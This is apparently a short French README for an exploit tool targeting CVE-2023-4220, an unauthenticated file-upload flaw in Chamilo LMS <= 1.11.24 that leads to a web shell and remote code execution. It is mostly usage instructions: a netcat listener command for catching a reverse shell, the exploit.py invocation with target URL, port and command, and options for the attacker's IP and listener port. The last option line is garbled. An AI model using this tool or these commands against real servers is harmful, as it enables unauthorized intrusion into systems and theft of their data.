CVE-2023-4220-RCE
Résumé
Avis de Starlabs
- Produit affecté : Chamilo <= v1.11.24
- Description : Téléchargement de fichier sans restriction dans la fonctionnalité de téléchargement de gros fichiers dans /main/inc/lib/javascript/bigupload/inc/bigUpload.php dans Chamilo LMS <= v1.11.24 permet à des attaquants non authentifiés d'effectuer des attaques de cross-site scripting stocké et d'obtenir une exécution de code à distance via le téléchargement d'un web shell.
- Score CVSS : 8.1 (Élevé)
Utilisation
- Configurez un écouteur netcat (si vous voulez un shell inverse)
sudo nc -lnvp 443
- Exécutez l'exploit
python3 exploit.py -u --url <REMOTE HOST>, -p --port [REMOTE PORT] -c --comand <COMMAND>
- Options pour le shell inverse
- -lh/--localhost : IP de l'attaquant
- **-lp/--localtcat port de l'écouteur